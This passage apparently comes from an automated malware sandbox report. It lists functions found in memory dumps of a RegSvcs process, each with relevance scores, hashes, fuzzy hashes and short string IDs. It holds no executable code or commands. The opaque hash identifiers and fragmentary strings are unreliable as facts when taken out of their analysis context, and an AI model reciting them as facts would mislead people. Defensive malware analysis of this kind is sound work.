                                                                  • Opcode Fuzzy Hash: 8ae9104c870abe74bcba238204eb09fbc2c3a2f4db4960ed34148d2e469970f5
                                                                  • Instruction Fuzzy Hash: 7A123B31E412198FDB64DF69C954AAEBBF2FF84300F218569D809AB365DB309D81CF91
                                                                  Function 0605E418 Relevance: 4.3, Strings: 3, Instructions: 568COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0oMp$DqMp$PHjq
                                                                  • API String ID: 0-2971219899
                                                                  • Opcode ID: 4c634ed0564f33c53c971ce4c43abdfbdb0a1467dd7207b29f1b3c924d795f44
                                                                  • Instruction ID: c8f8b59494962dcf97f6e916c7f815d964a159d54235f0aea5ad05ce06a83ee3
                                                                  • Opcode Fuzzy Hash: 4c634ed0564f33c53c971ce4c43abdfbdb0a1467dd7207b29f1b3c924d795f44
                                                                  • Instruction Fuzzy Hash: 9122D130B001088FDB94DB68D594A6EBBF6FF88310F218569D84ADB365EB35ED41CB91
                                                                  Function 06055D5F Relevance: 2.9, Strings: 2, Instructions: 423COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: XPoq$\Ooq
                                                                  • API String ID: 0-3424527247
                                                                  • Opcode ID: 3d486e11a052a8c47f931593e5c4da286f4e74c24ff0a6573359f5aaee9c752b
                                                                  • Instruction ID: 5050ef8ca7bf35f7710fac6327aa33baa110be32242f05489d5489f56b000deb
                                                                  • Opcode Fuzzy Hash: 3d486e11a052a8c47f931593e5c4da286f4e74c24ff0a6573359f5aaee9c752b
                                                                  • Instruction Fuzzy Hash: 93D1E831B501144FDF95DB68C854A6FBBF6FB88310F66846AE80ADB361CA36DC41CB91
                                                                  Function 06050040 Relevance: 2.0, Instructions: 1980COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7736c9b2b8ac81c8fffc8bb0e1aadf303295ba78e9aea85ee64968e5078bf154
                                                                  • Instruction ID: 36f476753776acc473007b29cc78116c1ce119a4aac7d8c3b8283264c772a9f2
                                                                  • Opcode Fuzzy Hash: 7736c9b2b8ac81c8fffc8bb0e1aadf303295ba78e9aea85ee64968e5078bf154
                                                                  • Instruction Fuzzy Hash: 7423F931D10A1A8EDB51EF68C88069DF7B1FF99300F15D69AE458B7221EB70AAD4CF41
                                                                  Function 009741C8 Relevance: .3, Instructions: 281COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af732fa691204e24b4f22e39d909f1dc8d765c4744d4ebb0784479da72433534
                                                                  • Instruction ID: f6acb89a3490cda10ad24d03d8cb8f73f5b7b1919aaa87a78b4cbb6a939b34b3
                                                                  • Opcode Fuzzy Hash: af732fa691204e24b4f22e39d909f1dc8d765c4744d4ebb0784479da72433534
                                                                  • Instruction Fuzzy Hash: ABB16C71E00219CFDB14CFA9C9857ADBBF6BF88704F14C129E819A72A5EB349841CF81
                                                                  Function 0604A178 Relevance: .3, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f27e84115d26b11130f4670edeebd378444cc6090ec76904fad5706e51217ca
                                                                  • Instruction ID: 204b041f9aa2e8381f8b47639a295584d04859c5bca0562680f22cd891e7a221
                                                                  • Opcode Fuzzy Hash: 4f27e84115d26b11130f4670edeebd378444cc6090ec76904fad5706e51217ca
                                                                  • Instruction Fuzzy Hash: 49A16D72F802098FCF95EFB5C8805DEBBB6BF84300B15457AE815AB225DB35E945DB80
                                                                  Function 0605A9B0 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-666546452
                                                                  • Opcode ID: 42274d679f22035abaf02edbb8907796c1f8263bb8efd190e35b05a3eb09033d
                                                                  • Instruction ID: ab859165389025c0474e062c3cc32770171eaa7d0d026a5be9103ef10da0efcf
                                                                  • Opcode Fuzzy Hash: 42274d679f22035abaf02edbb8907796c1f8263bb8efd190e35b05a3eb09033d
                                                                  • Instruction Fuzzy Hash: 92914C30B402099FEB94EF65D555BAF7FF6EF84300F118629E8019B295DB749D81CB90
                                                                  Function 06057110 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-3356825164
                                                                  • Opcode ID: 05aaadd8ecc181335ca72ce2d70269be415c798ead4ebe1efa346205886da47c
                                                                  • Instruction ID: 22771f7e969a159fda52415f53afdd999f520f21be5b7f01772da7fcfaf6ccbc
                                                                  • Opcode Fuzzy Hash: 05aaadd8ecc181335ca72ce2d70269be415c798ead4ebe1efa346205886da47c
                                                                  • Instruction Fuzzy Hash: 27F15E31B41208CFDB99EFA9D554A6EBBB6FF84300F21C529D8059B369DB359C42CB90
                                                                  Function 06058448 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq
                                                                  • API String ID: 0-2428501249
                                                                  • Opcode ID: 0b1fc5e7169c6ba6e7ab0f93493a4e59efb982ad652730ebcc73ce4115dcd808
                                                                  • Instruction ID: 0576023d52788cdf2f625c766b7b75a2954f6850a2fc0ff8a3b45022f884675e
                                                                  • Opcode Fuzzy Hash: 0b1fc5e7169c6ba6e7ab0f93493a4e59efb982ad652730ebcc73ce4115dcd808
                                                                  • Instruction Fuzzy Hash: B5B13931E412188FDB94EF68D5946AEBBB6FF84300F25C529D8059B399DB74DC82CB81
                                                                  Function 06058860 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRjq$LRjq$$jq$$jq
                                                                  • API String ID: 0-2974078839
                                                                  • Opcode ID: 24857070365b345ef21a955c6070559262dd686f862c4dd9070c1abda4ba1da5
                                                                  • Instruction ID: efffaa9fc77fa8f2d638ad42fb2a7daab5d5d8e2115eb16b98cdeeb07893a33d
                                                                  • Opcode Fuzzy Hash: 24857070365b345ef21a955c6070559262dd686f862c4dd9070c1abda4ba1da5
                                                                  • Instruction Fuzzy Hash: 9351B031B402118FDB98EB28D950A6EBBF6FF84300F15C569E8159B3A9DB71EC41CB91
                                                                  Function 0605AD38 Relevance: 5.2, Strings: 4, Instructions: 162COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq
                                                                  • API String ID: 0-2428501249
                                                                  • Opcode ID: 3bf38f841cdb7d474a9476137cea757f134f92d2a61d89afff58e3e9f9835616
                                                                  • Instruction ID: fe346f67d06632043893b3107181f8bc9909ec28cb15a8bea0bde8e1a0ce4078
                                                                  • Opcode Fuzzy Hash: 3bf38f841cdb7d474a9476137cea757f134f92d2a61d89afff58e3e9f9835616
                                                                  • Instruction Fuzzy Hash: CC518E30F512048FCFA5EA68E58066EBBF6EB84310F128629EC06D7255EB35DC41CB50